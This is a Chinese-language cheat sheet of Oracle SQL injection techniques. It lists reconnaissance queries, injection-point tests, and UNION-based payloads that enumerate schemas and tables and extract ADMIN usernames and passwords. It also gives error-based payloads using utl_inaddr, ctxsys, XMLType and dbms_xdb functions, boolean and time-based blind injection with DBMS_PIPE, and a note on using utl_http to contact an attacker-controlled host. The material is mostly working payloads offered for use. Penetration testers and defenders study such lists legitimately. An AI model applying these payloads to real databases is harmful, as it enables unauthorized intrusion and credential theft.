Oracle 数据库注入

常用查询语句

1 当前用户权限 (select * from session_roles)
2 当前数据库版本 ( select banner from sys.v_$version where rownum=1)
3 服务器出口IP (用 utl_http.request 让数据库主动访问攻击者控制的主机，从该主机的访问日志中得到出口 IP；11g 起受网络 ACL 限制，无权限时报 ORA-24247)
4 服务器监听IP (select utl_inaddr.get_host_address from dual)
5 服务器操作系统 (select member from v$logfile where rownum=1，返回的是 redo 日志文件路径，由路径格式如 /u01/... 或 D:\... 推断操作系统类型)
6 服务器sid (select instance_name from v$instance)
7 当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
8 定位文件(select name from V$datafile)
9 当前用户 (SELECT user FROM dual)
10 列出所有用户(select username from all_users order by username)
11 列出所有 schema(select distinct owner from all_tables)(Oracle 没有 MySQL 意义上的"库"，这里取的是表的 owner，即 schema 名)
12 列出表名(select table_name from all_tables)(select owner,table_name from all_tables)
13 查询所有字段名(select column_name from all_tab_columns where table_name='ADMIN')(未加引号创建的标识符在数据字典中存为大写，表名必须写成大写才能匹配)

判断注入点

and 1=1 -- 页面正常
and 1=2 -- 页面与 1=1 时不同（内容缺失或报错），说明条件被带入执行；联合查询时用 and 1=2 清空原查询结果，显示位上才会显示 union 出来的数据

联合查询

order by 定字段
order by 1 -- (逐步增大数字直到报错，报错前的最大值即列数)
Oracle 数据库自带 dual 表，from 语句后接 dual；Oracle 的 union 要求各列类型一致，所以先用 null 占位再逐列判断类型
and 1=2 union select null,null... from dual 一个一个判断字段类型
and 1=2 union select 'null',null... from dual 报错则第一列为数字型
and 1=2 union select null,'null'... from dual 正常则第二列为字符型
确定回显位
' and 1=2 union select 1,'2' from dual --
查询库名
union select 1,(select owner from all_tables where rownum=1) from dual (owner 即 schema 名)
查询第二个库名
union select 1,(select owner from all_tables where rownum=1 and owner<>'SYS') from dual (继续排除已得到的 owner 即可逐个枚举)
查询第一个表
union select 1,(select table_name from user_tables where rownum=1) from dual (user_tables 只含当前用户自己的表，其他 schema 的表需查 all_tables 并按 owner 过滤)
查询第二个表名
union select 1,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN') from dual
查询ADMIN第一个字段名
union select 1,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1) from dual
查询ADMIN第二个字段名
union select 1,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1) from dual
查询字段内容
union select 1,(select concat(username,password) from ADMIN where rownum=1) from dual (Oracle 的 concat 只接受两个参数，两个以上用 || 连接，如 username||':'||password；标量子查询必须只返回一行，不加 rownum=1 会报 ORA-01427)
union select 1,(select username from ADMIN where rownum=1),(select password from ADMIN where rownum=1) from dual (union 的列数必须与 order by 测出的列数一致，这里是三列的写法)

报错注入

and 1=utl_inaddr.get_host_name((select user from dual))-- (10g 可用；11g 起需网络 ACL 权限，无权限时报 ORA-24247，错误信息中不会带出查询结果)
and 1=ctxsys.drithsx.sn(1,(select user from dual)) --
and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null -- (%7c%7c 是 URL 编码后的 ||，拼出的 <:结果> 不是合法 XML，解析错误信息中会带出查询结果)
and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null --
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --
and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--
and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) -- (首字符为 S 时触发除零错误 ORA-01476，否则正常，属于基于报错的布尔判断)

布尔盲注

and 1=(select decode(user,'SYSTEM',1,0) from dual) 查询当前用户是否为 SYSTEM，如果是则 decode 返回 1 条件为真，不是则返回 0 条件为假
and 1=(select decode(substr(user,1,1),'S',1,0) from dual) 逐个字符猜解用户名（注意是 user 不是 use）
and 1=(select decode(substr(user,2,1),'Y',1,0) from dual)

and (select count(table_name) from user_tables)>1
and (select length(table_name) from user_tables where rownum=1)>5
and ascii(substr((select table_name from user_tables where rownum=1),1,1))>80
and (select length(column_name) from user_tab_columns where table_name='XXX' and rownum=1)>10 (长度直接比较即可，不需要再套 ascii(substr(...))；表名要加引号且大写)
and ascii(substr((select column_name from user_tab_columns where table_name='XXX' and rownum=1),1,1))>80 (阈值按二分法调整，逐个字符猜解)

延时盲注

dbms_pipe.receive_message('RDS',3) (在名为 RDS 的管道上等待 3 秒，超时后返回 1；需对 DBMS_PIPE 有 EXECUTE 权限)
A' and 1=(select decode(substr(user,1,1),'A',DBMS_PIPE.RECEIVE_MESSAGE('RDS',3),0) from dual) and '1'='1 (首字符为 A 时执行 receive_message，延时 3 秒且返回 1 使条件为真；否则返回 0 立即返回，通过响应时间判断)